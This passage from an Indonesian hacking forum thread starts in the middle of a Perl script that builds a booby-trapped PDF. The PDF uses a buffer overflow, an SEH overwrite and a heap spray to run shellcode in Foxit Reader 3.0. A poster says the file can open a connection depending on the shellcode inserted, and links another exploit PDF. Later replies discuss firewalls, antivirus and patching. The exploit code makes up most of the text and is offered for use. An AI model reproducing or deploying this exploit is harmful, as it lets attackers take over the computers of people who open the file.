	        "\x4C\x13\x6F\x56\xDC\xCD\xBC\x88\xB7\x38\x1F\x2A\x16\xE8\xB1\x1D\xF3\x88\x13\xB8\x11\x73".
	        "\xD4\x87\x97\xBC\x91\xDB\x6B\x12\x32\x0F\x6B\x36\x53\x58\xD8\xFC\xEC\xC5\xCD\x96\xEB\x6C".
	        "\x3A\x79\xD1\xAF\xE2\xFE\x70\xCC\x36\xB3\xD9\x7A\x3A\xE9\x0E\xA7\x6C\xD1\x7F\xDA\x3F\x6F".
	        "\xF2\xA2\x5C\xDB\xE6\xC3\xC6\xAD\xEF\xEE\x6C\xB7\x44\xDC\xEA\xED\xA7\xB3\x72\x95\xFB\xD7".
	        "\xAA\x05\xA6\x93\xC7\x58\x1F\x9B\xDD\xA1\xFD\xAA\xDF\x5C\xE0\xC7\x6F\xB0\xDE\x35\xFD\xC3".
	        "\x78\xF5\xF7\x9C\x63\x86\x6D\x3C\x9D\xFB\x1F\x51\xE3\x0A\xA7\x27\xE7\xE3\xA9\xFE\xAE\x7F".
	        "\xAE\x37\xAB\x54\xE6\xFD\x2E\xEE\x1F\x9E\x1F\xA7\x93\xD7\xC7\x7E\x17\xB3\xC5\x58\xE3\xD7".
	        "\xF9\x3D\xB0\xCB\x6C\x3C\x5E\x6D\xC6\x9D\x75\xDF\xEF\x76\x23\xA1\x84\x3B\x5F\x9A\xF3\xF3".
	        "\xA9\xDF\x3F\x2C\xDC\xBB\x6C\x40\x1B\xF5\xFF\x86\xFD\x56\xF4\x2E\xC1\x40\x6A\x71\x7B\xB7".
	        "\x1A\x9A\xB9\xCF\xDC\x37\x72\xFA\x53\x6A\x63\x6A\xF0\x1B\xD6\xC4\x4C\x73\x3C\xC5\x27\xD3".
	        "\x32\xBE\x66\x1F\x4F\x0A\x5D\x2C\xD3\xDC\x74\x54\xFD\x7D\xAE\x69\xD6\xFD\x6A\xB5\xCC\x34".
	        "\xF0\x73\xFF\x65\xCC\xA4\xCA\x27\x91\x14\xF1\x13\xE7\x6D\xDB\x93\x0D\x0A\x65\x6E\x64\x73".
	        "\x74\x72\x65\x61\x6D\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x36\x20\x30\x20\x6F\x62".
	        "\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x63\x74\x69\x6F\x6E\x2F\x53\x2F\x4A\x61".
	        "\x76\x61\x53\x63\x72\x69\x70\x74\x2F\x4A\x53\x20\x32\x37\x20\x30\x20\x52\x20\x3E\x3E\x0D".
	        "\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x78\x72\x65\x66\x0D\x0A\x30\x20\x33\x31\x0D\x0A\x30".
	        "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x36\x35\x35\x33\x36\x20\x66\x0D\x0A\x30\x30\x30".
	        "\x30\x30\x30\x30\x30\x31\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30".
	        "\x30\x30\x31\x39\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30".
	        "\x33\x31\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x33\x33".
	        "\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x34\x33\x32\x20".
	        "\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x34\x36\x38\x20\x30\x30".
	        "\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x35\x32\x32\x20\x30\x30\x30\x30".
	        "\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x36\x33\x33\x20\x30\x30\x30\x30\x30\x20".
	        "\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x38\x32\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0D".
	        "\x0A\x30\x30\x30\x30\x30\x30\x31\x30\x39\x32\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30".
	        "\x30\x30\x30\x30\x30\x31\x33\x31\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30".
	        "\x30\x30\x30\x31\x33\x37\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30".
	        "\x30\x31\x34\x34\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31".
	        "\x35\x30\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x35\x39".
	        "\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x36\x34\x39\x20".
	        "\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x37\x31\x37\x31\x20\x30\x30".
	        "\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x37\x32\x30\x36\x20\x30\x30\x30\x30".
	        "\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x37\x33\x30\x36\x20\x30\x30\x30\x30\x30\x20".
	        "\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x37\x33\x34\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D".
	        "\x0A\x30\x30\x30\x30\x30\x30\x37\x36\x33\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30".
	        "\x30\x30\x30\x30\x30\x37\x36\x37\x32\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30".
	        "\x30\x30\x30\x37\x37\x31\x31\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30".
	        "\x30\x38\x30\x35\x33\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x38".
	        "\x33\x38\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x39\x35\x31".
	        "\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x38\x36\x34\x31\x20".
	        "\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x38\x35\x39\x38\x20\x30\x30".
	        "\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x38\x35\x36\x30\x20\x30\x30\x30\x30".
	        "\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x38\x35\x32\x30\x20\x30\x30\x30\x30\x30\x20".
	        "\x6E\x0D\x0A\x74\x72\x61\x69\x6C\x65\x72\x0D\x0A\x3C\x3C\x2F\x52\x6F\x6F\x74\x20\x37\x20".
	        "\x30\x20\x52\x20\x2F\x49\x6E\x66\x6F\x20\x38\x20\x30\x20\x52\x20\x2F\x49\x44\x5B\x28\xDF".
	        "\xB0\x2B\xEC\xF3\x6B\xFA\x01\x9C\xBC\x4B\x06\x11\x7C\x78\x79\x29\x28\xDF\xB0\x2B\xEC\xF3".
	        "\x6B\xFA\x01\x9C\xBC\x4B\x06\x11\x7C\x78\x79\x29\x5D\x2F\x44\x6F\x63\x43\x68\x65\x63\x6B".
	        "\x73\x75\x6D\x2F\x37\x36\x33\x36\x30\x32\x39\x46\x42\x32\x42\x32\x46\x44\x32\x39\x42\x43".
	        "\x33\x34\x41\x42\x43\x33\x32\x43\x46\x34\x35\x42\x38\x46\x2F\x53\x69\x7A\x65\x20\x33\x31".
	        "\x3E\x3E\x0D\x0A\x73\x74\x61\x72\x74\x78\x72\x65\x66\x0D\x0A\x39\x35\x37\x30\x0D\x0A\x25".
	        "\x25\x45\x4F\x46\x0D\x0A";
#Now you cannot modify the shellcode in this Perl script but in the PDF's JavaScript.
#The set shellcode is calc.exe shellcode (alpha2).
my $overflow1 = "\x41" x 1346;
my $overflow2 = "\x41" x 4096;
my $sehjmp = "SkD"; # ;)
my $sehret = "\x30\x30\x30\x30";     # 0x30303030 - heap sprayed block

open (my $pdf, "> s.pdf");
binmode $pdf;
print $pdf $pdf_data1.
           $overflow1.$sehjmp.$sehret.$overflow2.
           $pdf_data2;
close $pdf;
    run with perl nanti ada file s.pdf yg bakal dibuat, klo dibaca ma foxit reader 3.0 bisa bikin koneksi inbound(tergantung shellcode yg dimasukin)


    atau bug ini :
    http://h1.ripway.com/07121985/bl4ck-...hell5500-2.pdf
  3. 10-04-09, 05:44 #3
    ditatompel
    ditatompel is offline
    ditatompel's Avatar
    Join Date
    Apr 2008
    Location
    Semarang, Jogja, Surabaya... Sak karepku....
    Posts
    308
    Points
    402.20
    Thanks: 0 / 2 / 2

    Default

    wih.... serem yaaa... update 11 maret?? besok brati??
    Quote Originally Posted by ditatompel View Post
    lets play truth and dare, or just play dare cause no one tells the truth anymore
  4. 10-04-09, 07:56 #4
    Black Zero
    Black Zero is offline
    Black Zero's Avatar
    Join Date
    Jun 2008
    Location
    Jakarta
    Posts
    6,985
    Points
    7,682.70
    Thanks: 8 / 7 / 7

    Default

    Biasanya sih klo ada firewall bisa blok outbound/inbound traffic illegal. Asal jgn run sbg administrator aja
  5. 10-04-09, 11:43 #5
    bl00d13z
    bl00d13z is offline
    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    yap... firewall jg ckup kalo .pdf nya coba bikin koneksi, klo .pdf nya inject file2 system untuk berprilaku abnormal..antivirus deh yg berperan..apalagi itu maenan shellcode loh.. intruksi di buffer bs syscall system,..mau ga mau patch reader nya biar ga da celah buffer..
  6. 15-04-09, 13:32 #6
    Mizuchi
    Mizuchi is offline
    Mizuchi's Avatar
    Join Date
    Sep 2008
    Posts
    259
    Points
    327.20
    Thanks: 0 / 0 / 0

    Default

    walah..
    file pdf kok jadi bahaya gini...
    pake adobe reader atau foxit tetep bahaya ya?
  • Sudahkah anda share hari ini ?
« Previous Thread | Next Thread »

Share This Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules

Page generated in 1.5304 seconds with 13 queries.